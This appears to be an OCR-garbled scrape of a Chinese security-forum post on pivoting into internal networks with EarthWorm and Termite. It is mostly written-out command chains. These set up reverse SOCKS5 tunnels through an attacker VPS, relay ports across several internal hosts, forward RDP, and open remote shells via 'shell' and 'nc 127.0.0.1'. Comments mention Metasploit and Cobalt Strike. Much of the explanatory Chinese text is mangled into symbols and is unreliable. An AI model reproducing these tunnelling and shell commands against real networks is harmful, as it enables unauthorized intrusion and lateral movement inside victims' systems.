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Threal'Hunltr 

(/?tab=no_name) 'i’lS (/) (/about) (/signup) (/signin) 

• 2 ^fy • HiiKIS bear (/user/bear) • 4744 ^SUlg • ffliReffr 


IE [p] socks v5M#tl 

https://xianzhi.aliyun.conyforunVread/735.html (https://xianzhi.aliyun.conyforunYread/735.html) 

ewJfei^^AisocksftilM^-: 

ew -s ssocksd -1 8888 

Termite: 

agent_exe -1 8888 

admin_exe -c [tartet_ip] -p 8888 

M/S‘ftadmin_exeM®#—M/S^PTSifE • 

goto 1 
socks 1080 

iWvps±®Wi080s®i£7— 

VPS : ew -s rcsocks -1 1080 -e 888 
Target: ew -s rssocks -d 139.X.X.113 -e 888 

ikWStWJWJJivps±®1080SP^f'i31fflArtra 

Termite: 
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VPS: ./agent_exe -1 888 

Target: ./agent_exe -c [139.x.x.113] -p 888 
VPS: ./admin_exe -c 127.0.0.1 -p 888 

Aadminfft£§£iS, target 

goto 2 

socks 1080 //IJflft^J^J^vps±®1080#^^IiaAggrtR] 

shell 6666 //ftvps±® Hffinc 127.0.0.1 6666^J^f^S®±#lfl*Jshell 

downfilefflupfile // 

https://xianzhi.aliyun.conVforunYread/735.html (https://xianzhi.aliyun.conYforurrVread/735.html) 


VPS: ew -s lcx_listen -1 10800 -e 888 //i£vps_h®;'^An$fffi|it}ll, lEl0800iiffiP4&iyiKf^llift/R$#5gin888 
B: ew -s ssocksd -1 999 //BHR/ljjSzSjsocksftll, «P999 

A: ew -s lcx_slave -d 139.x.x.ll3 -e 888 -f 10.48.128.49 -g 999 //SAlf/Lt®{£ffilcx_slaveW7iffiATO888 

m P ffl B±f/l fl^999iffi P 

0&S^aHvps^l0800^f£fflB±#l3§ig^socks5f^I 


TermiteMix#: 

VPS: ./agent_exe -1 888 

AZEl/l: ./agent_exe -c [139.x.x. 113] -p 888 
VPS: ./admin_exe -c 127.0.0.1 -p 888 
goto 2 
listen 999 

Bill: ./agent_exe -c 10.48.128.49 -p 999 

goto 3 
socks 10800 


itk0!tatR[J^i^vPS±®^i0800#^)socksf'cS ) fflAB^rtKIo 

/A±®^J##^J^#tii*TermiteR^ffiagent : p*i:ffijiSSB*, ^^J^ffiadnin 

i£#SP$m 
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goto 3 
shell 7777 

^/E4vps±® nc 127.0.0.1 7777gt^#B±^l^)shell 

— 'rJiS: RHagentlSadrrinstnJJRKlfMS^ 

=ykmt&wm: 

VPS: ew -s rcsoskc -1 1080 -e 888 

A: ew -s lcx_slave -d 139.X.X.113 -e 888 -f 10.48.128.12 -g 999 
B: ew -s lcx_listen -1 999 -e 777 
C: ew -s rssocks -d 10.48.128.12 -e 777 

llk0!tatR[J^3liavPS±®^139.x.x.ll3^1080iSn5feffifflSC±#l^iS^socks5l'^il 

Termite: 

VPS: ./agent_exe -1 888 

AEtfl: ./agent_exe -c [139.X.X.113] -p 888 
VPS: ./admin_exe -c 127.0.0.1 -p 888 
B: ./agent_exe -1 999 //B±#IJFJh —''MKiRfr 
goto 2 

connect 10.48.128.12 999 //i£ffi§'jBZE#l 

C: ./agent_exe -1 777 
goto 3 //S*$$I'jB±#li?* 

connect 192.168.0.10 777 //SB=p^iSiC3E#l 


goto 3 //@fci[]B 

listen 666 

C: ./agent_exe -c 10.48.128.12 666 


vifeTW 
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mmsi^ 

• Icxtranjg^Ti^T, ^-^P$££ 0 ®£P®Bt 5 *lcxtran 10000 CWIP 3389, ihkBtT 

ii^vps±®^]10000seRl^ji^C^3389^ 

• http://rootkiter.corn/Termite/README.txt (http://rootkiter.corn/Termite/README.txt) 

• https://xianzhi.aliyun.corn/forum/read/735.html (https://xianzhi.aliyun.corn/forurn/read/735.html) 


4 01 

(/use r/j mad min) jmadmin (/user/jmadmin) m»2^m 

(/user/bear) bear (/user/bear) 2m»2 ^su 
@jmadmin (/user/jmadrrin) 14ittl4/ ^;J5!Jixt, 4 1 04c 

(/user/bigdick) bigdick (/user/bigdick) 3|£»2 ^iu 

mm MSF COBALTSTRIKE±^»socks4®fI 


(/user/RcoIl) Rcoll (/user/Rcoll) m»2 %-m 
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